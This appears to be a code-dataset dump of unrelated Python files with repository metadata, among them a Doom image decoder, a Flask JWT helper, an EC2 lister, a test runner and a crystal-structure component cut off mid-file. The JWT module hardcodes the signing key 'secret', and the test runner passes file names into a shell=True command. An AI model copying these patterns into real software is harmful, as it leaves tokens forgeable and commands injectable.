from struct import Struct from typing import Optional from PIL import Image from doom.palette import Palette class DoomImage(object): S_HEADER: Struct = Struct('<HHhh') def __init__(self, width: int, height: int, left: int, top: int): self.width: int = width self.height: int = height self.left: int = left self.top: int = top self.pixels: Optional[bytes] = None @classmethod def from_data(cls, data: bytes, palette: Palette): """ Creates a DoomImage with doom graphics data rendered to an internal buffer. :param data: :param palette: :return: """ width, height, left, top = DoomImage.S_HEADER.unpack_from(data) data_len = len(data) # Attempt to detect invalid data. if width > 2048 or height > 2048 or top > 2048 or left > 2048: return None if width <= 0 or height <= 0: return None image = cls(width, height, left, top) # Initialize an empty bitmap. pixels = bytearray([0, 0, 0] * width * height) pixels_len = len(pixels) # Read column offsets. offset_struct = Struct('<' + ('I' * width)) offsets = offset_struct.unpack_from(data[8:8 + (width * 4)]) # Read columns. column_index = 0 while column_index < width: offset = offsets[column_index] # Attempt to detect invalid data. if offset >= data_len: return None prev_delta = 0 while True: column_top = data[offset] # Column end. if column_top == 255: break # Tall columns are extended. if column_top <= prev_delta: column_top += prev_delta prev_delta = column_top pixel_count = data[offset + 1] offset += 3 pixel_index = 0 while pixel_index < pixel_count: if offset + pixel_index >= data_len: break pixel = data[offset + pixel_index] destination = ((pixel_index + column_top) * width + column_index) * 3 if destination + 2 < pixels_len: pixels[destination + 0] = palette.colors[pixel].r pixels[destination + 1] = palette.colors[pixel].g pixels[destination + 2] = palette.colors[pixel].b pixel_index += 1 offset += pixel_count + 1 if offset >= data_len: break column_index += 1 image.pixels = bytes(pixels) return image @staticmethod def is_valid(data: bytes) -> bool: """ Determine if some data is likely to be a valid Doom type image. :param data: :return: """ if len(data) < 16: return False # Verify if the header values are sane. width, height, left, top = DoomImage.S_HEADER.unpack_from(data) if width > 2048 or height > 2048 or top > 2048 or left > 2048: return False if width <= 0 or height <= 0: return False # Verify that offsets are in range of the data. offset_struct = Struct('<' + ('I' * width)) offsets = offset_struct.unpack_from(data[8:8 + (width * 4)]) for offset in offsets: if offset >= len(data): return False return True def get_pillow_image(self) -> Image: """ Returns a Pillow image from this graphic's image data. :return: """ return Image.frombytes('RGB', (self.width, self.height), self.pixels)
29.106061
89
0.525508
434
3,842
4.539171
0.251152
0.018274
0.028426
0.027411
0.214213
0.214213
0.188832
0.165482
0.165482
0.165482
0
0.026854
0.389381
3,842
131
90
29.328244
0.812873
0.134565
0
0.297297
0
0
0.003751
0
0
0
0
0
0
1
0.054054
false
0
0.054054
0
0.27027
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82027cf84d56a19e89654387f3e3771d2c030696
4,327
py
Python
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
bdd_mtl/tools/eval_seg.py
XDong18/bdd-mtl
90459c090a2bc4a89a929740e5cf5d37c1b34a4b
[ "BSD-3-Clause" ]
null
null
null
import argparse import boundary_utils as bu import numpy as np import os import sys import time from utils import * from multiprocessing import Pool import pickle as pk from PIL import Image def parse_args(): parser = argparse.ArgumentParser( description='Evaluate drivable area and semantic segmentation predictions') parser.add_argument('-d', '--data-dir', default=None) parser.add_argument('-p', '--pred-dir', default=None) args = parser.parse_args() return args def _eval_drivable(infos): global task gt_fn, pred_fn = infos gt = np.array(Image.open(gt_fn)) pred = np.load(pred_fn) drivable_hist = fast_hist(pred.flatten(), gt.flatten(), 3) return [drivable_hist] def _eval_sem_seg(infos): global task gt_fn, pred_fn = infos gt = np.array(Image.open(gt_fn)) pred = np.load(pred_fn).squeeze(0).astype(np.uint8) # semantic segmentation hist = fast_hist(pred.flatten(), gt.flatten(), 19) return hist def main(): args = parse_args() tasks = os.listdir(args.pred_dir) # segmentation if 'sem_seg' in tasks: print('Evaluating semantic segmentation...') sem_seg_base = os.path.join(args.data_dir, 'images', '10k', 'val') gt_fns = [os.path.join(args.data_dir, 'labels', 'sem_seg', 'sem_seg_val', fn[:-4] + '_train_id.png') for fn in os.listdir(sem_seg_base)] sem_seg_fns = [os.path.join(args.pred_dir, 'sem_seg', '{}.npy'.format(fn[:-4])) for fn in os.listdir(sem_seg_base)] pool = Pool(5) o = pool.imap_unordered(_eval_sem_seg, zip(gt_fns, sem_seg_fns)) tic = time.time() while len(o._items) < len(gt_fns): toc = time.time() finished = len(o._items) if finished > 0: print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r') time.sleep(10) pool.close() pool.join() evals = [i[1] for i in o._items] hist = np.sum(evals, axis=0) ious = per_class_iu(hist).tolist() classes = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle', 'TOTAL'] ious.append(np.nanmean(ious)) print('[SEMANTIC]') [print(a, '\t\t', b) for a, b in zip(classes, ious)] print(','.join([str(i) for i in ious])) # drivable area if 'drivable' in tasks: print('Evaluating drivable...') drivable_base = os.path.join(args.data_dir, 'labels', 'drivable', 'drivable_val') gt_fns = sorted([os.path.join(drivable_base, d) for d in os.listdir(drivable_base)]) pred_drivable_base = os.path.join(args.pred_dir, 'drivable') drivable_fns = [os.path.join(pred_drivable_base, '{}.npy'.format(n.split('.')[0].split('/')[-1])) for n in gt_fns] pool = Pool(10) print(len(gt_fns), len(drivable_fns)) o = pool.imap_unordered(_eval_drivable, zip(gt_fns, drivable_fns)) tic = time.time() while len(o._items) < len(gt_fns): toc = time.time() finished = len(o._items) if finished > 0: print('{}/{} ETA: {}s Elapsed: {}s'.format(finished, len(gt_fns), (len(gt_fns) - finished) / finished * (toc - tic), toc - tic), end='\r') time.sleep(10) pool.close() pool.join() drivable_evals = [i[1] for i in o._items] # if len(drivable_evals[0][0]) == 9: # lane_evals = np.mean([i[0] for i in drivable_evals], axis=0) # print('[LANE]\n[thresh=10] {} {} {}\n[thresh=5] {} {} {}\n[thresh=1] {} {} {}'.format(*lane_evals)) # for e in lane_evals: # print(e) drivable_hist = np.sum(drivable_evals, axis=0) drivable_ious = per_class_iu(drivable_hist[0]).tolist() drivable_ious.append(sum(drivable_ious[1:])/2) print('[DRIVABLE]\n[direct] {} [alt] {} [overall] {}'.format(*drivable_ious[1:])) for d in drivable_ious: print(d) if __name__ == '__main__': main()
39.336364
226
0.580772
593
4,327
4.055649
0.256324
0.024948
0.029106
0.029106
0.353015
0.332225
0.306445
0.245322
0.2079
0.2079
0
0.011523
0.257915
4,327
109
227
39.697248
0.737465
0.067945
0
0.282353
0
0
0.131545
0
0
0
0
0
0
1
0.047059
false
0
0.117647
0
0.2
0.117647
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82037678cf731a27de7b80202c8ec58995f0f61d
1,795
py
Python
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
jungle_book/auth/jwt.py
EmilTheSadCat/jungle-book-app
9b92ba8b889943ce3636a88d538a59ee339869f1
[ "MIT" ]
null
null
null
import jwt from flask import request, jsonify from datetime import datetime from dateutil.relativedelta import relativedelta from functools import wraps from jungle_book.user.models import User algorithm = "HS256" key = "secret" # TODO put this into env variables NOW = datetime.now() SIX_MONTHS_LATER = NOW + relativedelta(months=+6) def encode_jwt(payload): """Encode JWT token with HS256 hashing algorithm""" payload.update({ "exp": SIX_MONTHS_LATER, "iat": NOW }) token = jwt.encode( payload=payload, key=key, algorithm=algorithm ).decode('utf-8') return token def decode_jwt(token): """Decode JWT token""" decoded_token = jwt.decode(jwt=token, key=key) return decoded_token def validate_jwt(token): """Validate given JWT""" try: jwt.decode(jwt=token, key=key) except jwt.ExpiredSignatureError: return False return True def extend_jwt(token): """Returns new JWT if given token is valid""" if validate_jwt(token): payload = decode_jwt(token) new_token = encode_jwt(payload) return new_token else: return "Provided token is invalid." def token_required(f): @wraps(f) def decorated(*args, **kwargs): token = None if 'x-access-token' in request.headers: token = request.headers['x-access-token'] if not token: return jsonify({'message': 'Token is missing'}), 401 try: data = decode_jwt(token) user = User.query.filter_by(id=data['id']).first() except jwt.exceptions.DecodeError: return jsonify({'message': 'Token is invalid!'}), 401 return f(user, *args, **kwargs) return decorated
23.311688
65
0.627855
220
1,795
5.036364
0.372727
0.072202
0.075812
0.030686
0.090253
0.041516
0
0
0
0
0
0.01063
0.266295
1,795
76
66
23.618421
0.830676
0.086351
0
0.038462
0
0
0.077208
0
0
0
0
0.013158
0
1
0.115385
false
0
0.115385
0
0.423077
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
820477ca11e0ba3796ae1ed723f0175e4fd87448
2,035
py
Python
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
11
2021-02-02T16:27:16.000Z
2021-08-31T06:22:49.000Z
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
75
2021-02-24T17:30:31.000Z
2021-12-08T00:01:18.000Z
pysnmp/REMOTE-LOGIN-TRAP-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module REMOTE-LOGIN-TRAP-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/REMOTE-LOGIN-TRAP-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 20:47:32 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint") s5AgRemoteLoginIp, s5AgRemoteLoginStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgRemoteLoginIp", "s5AgRemoteLoginStatus") remoteLoginTrap, = mibBuilder.importSymbols("S5-ROOT-MIB", "remoteLoginTrap") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") Counter64, Integer32, NotificationType, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Gauge32, IpAddress, MibIdentifier, NotificationType, ModuleIdentity, ObjectIdentity, Bits, TimeTicks, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Integer32", "NotificationType", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Gauge32", "IpAddress", "MibIdentifier", "NotificationType", "ModuleIdentity", "ObjectIdentity", "Bits", "TimeTicks", "Counter32") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") remoteLoginStatus = NotificationType((1, 3, 6, 1, 4, 1, 45, 1, 6, 2, 8) + (0,1)).setObjects(("S5-AGENT-MIB", "s5AgRemoteLoginIp"), ("S5-AGENT-MIB", "s5AgRemoteLoginStatus")) mibBuilder.exportSymbols("REMOTE-LOGIN-TRAP-MIB", remoteLoginStatus=remoteLoginStatus)
113.055556
515
0.786241
200
2,035
8
0.51
0.115
0.028125
0.03375
0.35375
0.23
0.23
0.23
0.23
0.23
0
0.049285
0.072727
2,035
17
516
119.705882
0.798622
0.165111
0
0
0
0
0.363905
0.063314
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
82063e18e59a0cf3835ff63d9115c425615a4eb0
877
py
Python
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
76
2019-01-03T18:14:01.000Z
2022-03-28T20:09:42.000Z
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
104
2019-01-01T17:09:52.000Z
2022-03-31T17:53:48.000Z
admin/aws/list_instances.py
biosimulations/hsds
bd5b659c4fcc60c4a2791b2f39750faaa9098d09
[ "Apache-2.0" ]
41
2019-01-30T13:58:16.000Z
2022-02-23T13:13:01.000Z
import boto.ec2 import config region = config.get("aws_region") conn = boto.ec2.connect_to_region(region) reservations = conn.get_all_instances() fields = ("id", "public ip", "private ip", "name", "subnet", "state") format_str = "{:<20} {:<16} {:<16} {:<16} {:<16} {:<12}" print(format_str.format(*fields)) sep = ('-'*12,) * 6 print(format_str.format(*sep)) for res in reservations: for inst in res.instances: name = '<none>' if 'Name' in inst.tags: name = inst.tags["Name"] if inst.ip_address is None: inst.ip_address = '<none>' if inst.private_ip_address is None: inst.private_ip_address = '<none>' if inst.subnet_id is None: inst.subnet_id = "<none>" print(format_str.format(inst.id, inst.ip_address, inst.private_ip_address, name, inst.subnet_id, inst.state))
32.481481
117
0.615735
123
877
4.219512
0.308943
0.104046
0.080925
0.115607
0.146435
0
0
0
0
0
0
0.024963
0.223489
877
26
118
33.730769
0.737151
0
0
0
0
0
0.136986
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.136364
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82073259142e93c2fdba09723427d60b8a6ec446
5,795
py
Python
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
src/regression.py
rahlk/Rosie
60dc9d6a5590cdfbafbcbb0a7285db4e496384cc
[ "MIT" ]
null
null
null
''' Created on Feb 8, 2017 This is the regression script the langlib project. It is meant to be run at the top level directory of the repository. ''' import copy,json from os import walk from os.path import exists,splitext from subprocess import Popen, PIPE from string import digits import difflib import sys #This is the location of the testfiles and manifest relative to the root directory. testfiles = "./testfiles/" manifest_file = "./MANIFEST" #This dict defines the translation from directory names in the "testfiles" directory to actual rosie pattern #i.e. csharp -> "cs.<pattern>" langs = { "java" : "java", "c" : "c", "cpp" : "cpp", "csharp" : "cs", "go" : "go", "javascript" : "js", "ruby" : "rb", "r" : "r", "bash" : "b", "vb" : "vb", "python" : "py", } #This array defines the actuals expected to be ran by the script. These are also the expected directory names #for associated tests under the testfiles/language i.e. each "comments" -> "./testfiles/<language>/comments/ tests = [ "comments", "dependencies", "functions", "classes", "structs", "strings" ] class HtmlPrinter: ''' This is a simple html printer used to write the various results table generated by run_tests to an html file. ''' def __init__(self,id): ''' Initializes the printer id : Numeric id of the test execution (test id). ''' self.ts = id self.file=open("./result" + str(self.ts) + ".html", 'w') def add_table(self,test,html): self.file.write("<h1>" + test + "</h1>") self.file.write(html) def close(self): self.file.close() def run_tests(): ''' This function iterates through all directories found under ./testfiles/ and executes tests if possible. The process is as follows: 1. Find directory in ./testfiles/, and verify if it maps to a value in the langs. Continue to step 2 if it does not or move to new directory. 2. Find a directory in the langs directory found in step 1, and verify if it maps to a test in the tests array. Continue to step 3 if it does not or move to a new directory. 3. Find a file in the test directory found in step 2. If the file is correctly named i.e <pattern name><numeric id>.<valid_extension> then strip the numeric id, and and the pattern name. 4. Verify that the input file has a corresponding json output file in ./testfiles/<lang>/output/<test>/. If it does continue to step 5 otherwise move to a new test file. 5. Execute the input file and compare the results to the output file. Fail the test if a difference is found, and print the diff using HTMLPrinter. 6. Move to new test file as appropriate and continue. ''' failures = 0 testCount = 0 printer = HtmlPrinter(sys.argv[1]) for test in tests: for lang,alias in langs.items(): base_path = testfiles + lang + "/input/" + test + "/" for (dirpath, dirnames, test_files) in walk(base_path): for test_file in test_files: resolved_input = dirpath + test_file resolved_output = splitext(resolved_input)[0].replace("input","output") + ".json" if not exists(resolved_input): continue if not exists(resolved_output): continue with open(resolved_output, 'rU') as vOut: test_file_name = splitext(test_file)[0] pattern = copy.copy(test_file_name) pattern = pattern.translate(None,digits) proc = Popen('rosie -manifest ' + manifest_file + ' -wholefile -encode json ' + alias + "." + pattern + " " + resolved_input, stdout=PIPE, stderr=PIPE,shell=True) stdout = '' stderr = '' for line in proc.stdout: stdout += line for line in proc.stderr: stderr += line if(stderr != ''): print(stderr) try: json1 = json.loads(vOut.read()) json2 = json.loads(stdout) jsonOut1 = json.dumps(json1,indent=2, sort_keys=True) jsonOut2 = json.dumps(json2,indent=2, sort_keys=True) if jsonOut1 != jsonOut2: differ = difflib.HtmlDiff() printer.add_table(lang + " : " + test_file_name, ''.join(differ.make_file(jsonOut1.splitlines(True),jsonOut2.splitlines(True)))) failures += 1 print("-------------------------------------------------") print (test_file_name + " test failed for " + lang) except ValueError: failures += 1 print("-------------------------------------------------") print (test_file_name + " test failed for " + lang) testCount += 1 print("-------------------------------------------------") if(testCount == 1): print(str(testCount) + " test ran") else: print(str(testCount) + " tests ran") if(failures == 1): print(str(failures) + " test failed") else: print(str(failures) + " tests failed") print("-------------------------------------------------") printer.close() if(failures > 0): exit(1) if __name__ == '__main__': run_tests()
41.099291
186
0.534599
672
5,795
4.540179
0.327381
0.026221
0.019666
0.008522
0.069485
0.05703
0.05703
0.031465
0.031465
0.031465
0
0.010909
0.335634
5,795
140
187
41.392857
0.781558
0.30906
0
0.108696
0
0
0.133195
0.05079
0
0
0
0
0
1
0.043478
false
0
0.076087
0
0.130435
0.152174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
82075f1bc0f847438e1a50eb1984f6a6e589570a
4,727
py
Python
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
personal/sudoku_solver/sudoku_solver.py
jyodroid/python_training
7b17145faed6a005d44a08c2f72a60644705f1e1
[ "Unlicense" ]
null
null
null
# Class https://docs.python.org/3/tutorial/classes.html class SudokuSolver: def __init__(self, boxes, unitlist): self.boxes = boxes self.unitlist = unitlist # My solution def set_boxes_values(values): board = {} for index in range(len(self.boxes)): board[self.boxes[index]] = values[index] return board #Better solution def grid_values(self, values): assert len(values) == 81, "Input grid must be a string of length 81 (9x9)" return dict(zip(self.boxes, values)) # The elimination technique https://youtu.be/6rFOX2jHB2g #Adding Grid values with elimination technique so we can add possible values to grid def grid_all_posibilities(self, values): assert len(values) == 81, "Input grid must be a string of length 81 (9x9)" board = {} for index in range(len(self.boxes)): value = values[index] if value == ".": board[self.boxes[index]] = "123456789" else: board[self.boxes[index]] = value return board # Udacity solution def another_grid_all_posibilities(values): values = [] all_digits = '123456789' for c in grid: if c == '.': values.append(all_digits) elif c in all_digits: values.append(c) assert len(values) == 81 return dict(zip(self.boxes, values)) # Find board places with one digit element and discard from peers other options def __eliminate(self, values): units = dict((s, [u for u in self.unitlist if s in u]) for s in self.boxes) peers = dict((s, set(sum(units[s],[]))-set([s])) for s in self.boxes) solved_values = [box for box in values.keys() if len(values[box]) == 1] for box in solved_values: digit = values[box] for peer in peers[box]: values[peer] = values[peer].replace(digit, '') return values # Only choise technique: https://youtu.be/sSjYn-Kex1A def __only_choise(self, values): for unit in self.unitlist: for digit in '123456789': dplaces = [box for box in unit if digit in values[box]] if len(dplaces) == 1: values[dplaces[0]] = digit return values # Constraints propagation on solving puzzle def reduce_puzzle(self, values): stalled = False while not stalled: # Check how many boxes have a determined value solve_values_before = len([box for box in values.keys() if len(values[box]) == 1]) #Use eliminate strategy self.__eliminate(values) #Use Only choise strategy self.__only_choise(values) #Check how many boxes have a determined value to compare solve_values_after = len([box for box in values.keys() if len(values[box]) == 1 ]) #If no new values were added, stop the loop. stalled = solve_values_before == solve_values_after #Sanity check: return false if there is a box with zero available values: if len([box for box in values.keys() if len(values[box]) == 0]): return False return values # search strategy https://youtu.be/omveZu2gRLs def search(self, values): # "Using depth-first search and propagation, create a search tree and solve the sudoku." # First, reduce the puzzle using the previous function values = self.reduce_puzzle(values) if values is False: return False #Error propagation if all(len(values[s]) == 1 for s in self.boxes): return values # Solved # Choose one of the unfilled squares with the fewest possibilities n, s = min((len(values[s]), s) for s in self.boxes if len(values[s]) > 1) # Now use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer! for value in values[s]: new_sudoku = values.copy() new_sudoku[s] = value attempt = self.search(new_sudoku) if attempt: return attempt def display(self, values, rows, columns): """ Display the values as a 2-D grid. Input: The sudoku in dictionary form Output: None """ width = 1+max(len(values[s]) for s in self.boxes) line = '+'.join(['-'*(width*3)]*3) for r in rows: print(''.join(values[r+c].center(width)+('|' if c in '36' else '') for c in columns)) if r in 'CF': print(line) return
37.220472
131
0.584303
623
4,727
4.369181
0.277689
0.046289
0.017634
0.018369
0.201323
0.190301
0.152094
0.152094
0.101396
0.101396
0
0.018938
0.318595
4,727
126
132
37.515873
0.826141
0.243072
0
0.2
0
0
0.036395
0
0
0
0
0
0.0375
1
0.125
false
0
0
0
0.2875
0.025
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820790042011984b310814afa864c57777d5d354
10,956
py
Python
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
null
null
null
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
5
2018-10-18T19:52:12.000Z
2018-11-17T19:02:49.000Z
crystal_toolkit/components/transformations/grainboundary.py
mkhorton/mp-dash-components
b9af1b59f0120a90897631d9a7f8d9f0ae561de9
[ "MIT" ]
null
null
null
import dash from dash import dcc from dash.dependencies import Input, Output, State from dash.exceptions import PreventUpdate from pymatgen.symmetry.analyzer import SpacegroupAnalyzer from pymatgen.transformations.advanced_transformations import ( GrainBoundaryGenerator, GrainBoundaryTransformation, ) from crystal_toolkit.components.transformations.core import TransformationComponent from crystal_toolkit.helpers.layouts import add_label_help class GrainBoundaryTransformationComponent(TransformationComponent): @property def title(self): return "Make a grain boundary" @property def description(self): return """Create a grain boundary within a periodic supercell. This transformation requires sensible inputs, and will be slow to run in certain cases. When using this transformation a new site property is added which can be used to colour-code the top and bottom grains.""" @property def transformation(self): return GrainBoundaryTransformation def options_layouts(self, state=None, structure=None): state = state or { "rotation_axis": [0, 0, 1], "rotation_angle": None, "expand_times": 2, "vacuum_thickness": 0, "ab_shift": [0, 0], "normal": False, "ratio": None, "plane": None, "max_search": 20, "tol_coi": 1e-8, "rm_ratio": 0.7, "quick_gen": False, } rotation_axis = self.get_numerical_input( label="Rotation axis", kwarg_label="rotation_axis", state=state, help_str="""Maximum number of atoms allowed in the supercell.""", shape=(3,), ) # sigma isn't a direct input into the transformation, but has # to be calculated from the rotation_axis and structure _, sigma_options, _ = self._get_sigmas_options_and_ratio( structure, state.get("rotation_axis") ) sigma = dcc.Dropdown( id=self.id("sigma"), style={"width": "5rem"}, options=sigma_options, value=sigma_options[0]["value"] if sigma_options else None, ) sigma = add_label_help( sigma, "Sigma", "The unit cell volume of the coincidence site lattice relative to " "input unit cell is denoted by sigma.", ) # likewise, rotation_angle is then a function of sigma, so # best determined using sigma to provide a default value: # this is initialized via a callback rotation_angle = self.get_choice_input( label="Rotation angle", kwarg_label="rotation_angle", state=state, # starts as None help_str="""Rotation angle to generate grain boundary. Options determined by your choice of Σ.""", style={"width": "15rem"}, ) expand_times = self.get_numerical_input( label="Expand times", kwarg_label="expand_times", state=state, help_str="""The multiple number of times to expand one unit grain into a larger grain. This is useful to avoid self-interaction issues when using the grain boundary as an input to further simulations.""", is_int=True, shape=(), min=1, max=6, ) vacuum_thickness = self.get_numerical_input( label="Vacuum thickness /Å", kwarg_label="vacuum_thickness", state=state, help_str="""The thickness of vacuum that you want to insert between the two grains.""", shape=(), ) ab_shift = self.get_numerical_input( label="In-plane shift", kwarg_label="ab_shift", state=state, help_str="""In-plane shift of the two grains given in units of the **a** and **b** vectors of the grain boundary.""", shape=(2,), ) normal = self.get_bool_input( label="Set normal direction", kwarg_label="normal", state=state, help_str="Enable to require the **c** axis of the top grain to be perpendicular to the surface.", ) plane = self.get_numerical_input( label="Grain boundary plane", kwarg_label="plane", state=state, help_str="""Grain boundary plane in the form of a list of integers. If not set, grain boundary will be a twist grain boundary. The plane will be perpendicular to the rotation axis.""", shape=(3,), ) tol_coi = self.get_numerical_input( label="Coincidence Site Tolerance", kwarg_label="tol_coi", state=state, help_str="""Tolerance to find the coincidence sites. To check the number of coincidence sites are correct or not, you can compare the generated grain boundary's sigma with expected number.""", shape=(), ) rm_ratio = self.get_numerical_input( label="Site Merging Tolerance", kwarg_label="rm_ratio", state=state, help_str="""The criteria to remove the atoms which are too close with each other relative to the bond length in the bulk system.""", shape=(), ) return [ rotation_axis, sigma, rotation_angle, expand_times, vacuum_thickness, ab_shift, normal, plane, tol_coi, rm_ratio, ] @staticmethod def _get_sigmas_options_and_ratio(structure, rotation_axis): rotation_axis = [int(i) for i in rotation_axis] lat_type = ( "c" # assume cubic if no structure specified, just to set initial choices ) ratio = None if structure: sga = SpacegroupAnalyzer(structure) lat_type = sga.get_lattice_type()[0] # this should be fixed in pymatgen try: ratio = GrainBoundaryGenerator(structure).get_ratio() except Exception: ratio = None cutoff = 10 if lat_type.lower() == "c": sigmas = GrainBoundaryGenerator.enum_sigma_cubic( cutoff=cutoff, r_axis=rotation_axis ) elif lat_type.lower() == "t": sigmas = GrainBoundaryGenerator.enum_sigma_tet( cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio ) elif lat_type.lower() == "o": sigmas = GrainBoundaryGenerator.enum_sigma_ort( cutoff=cutoff, r_axis=rotation_axis, c2_b2_a2_ratio=ratio ) elif lat_type.lower() == "h": sigmas = GrainBoundaryGenerator.enum_sigma_hex( cutoff=cutoff, r_axis=rotation_axis, c2_a2_ratio=ratio ) elif lat_type.lower() == "r": sigmas = GrainBoundaryGenerator.enum_sigma_rho( cutoff=cutoff, r_axis=rotation_axis, ratio_alpha=ratio ) else: return [], None, ratio options = [] subscript_unicode_map = { 0: "₀", 1: "₁", 2: "₂", 3: "₃", 4: "₄", 5: "₅", 6: "₆", 7: "₇", 8: "₈", 9: "₉", } for sigma in sorted(sigmas.keys()): sigma_label = "Σ{}".format(sigma) for k, v in subscript_unicode_map.items(): sigma_label = sigma_label.replace(str(k), v) options.append({"label": sigma_label, "value": sigma}) return sigmas, options, ratio def generate_callbacks(self, app, cache): super().generate_callbacks(app, cache) @app.callback( Output(self.id("sigma"), "options"), [Input(self.get_kwarg_id("rotation_axis"), "value")], [State(self.id("input_structure"), "data")], ) def update_sigma_options(rotation_axis, structure): rotation_axis = self.reconstruct_kwarg_from_state( dash.callback_context.inputs, "rotation_axis" ) if (rotation_axis is None) or (not structure): raise PreventUpdate structure = self.from_data(structure) _, sigma_options, _ = self._get_sigmas_options_and_ratio( structure=structure, rotation_axis=rotation_axis ) # TODO: add some sort of error handling here when sigmas is empty return sigma_options @app.callback( Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), "options"), [ Input(self.id("sigma"), "value"), Input(self.get_kwarg_id("rotation_axis"), "value"), ], [State(self.id("input_structure"), "data")], ) def update_rotation_angle_options(sigma, rotation_axis, structure): if not sigma: raise PreventUpdate rotation_axis = self.reconstruct_kwarg_from_state( dash.callback_context.inputs, "rotation_axis" ) if (rotation_axis is None) or (not structure): raise PreventUpdate structure = self.from_data(structure) sigmas, _, _ = self._get_sigmas_options_and_ratio( structure=structure, rotation_axis=rotation_axis ) rotation_angles = sigmas[sigma] options = [] for rotation_angle in sorted(rotation_angles): options.append( {"label": "{:.2f}º".format(rotation_angle), "value": rotation_angle} ) return options # TODO: make client-side callback @app.callback( [Output(self.id("sigma"), "value"), Output(self.id("sigma"), "disabled")], [ Input(self.id("sigma"), "options"), Input(self.id("enable_transformation"), "on"), ], ) def update_default_value(options, enabled): if not options: raise PreventUpdate return options[0]["value"], enabled # TODO: make client-side callback, or just combine all callbacks here @app.callback( Output(self.id("rotation_angle", is_kwarg=True, hint="literal"), 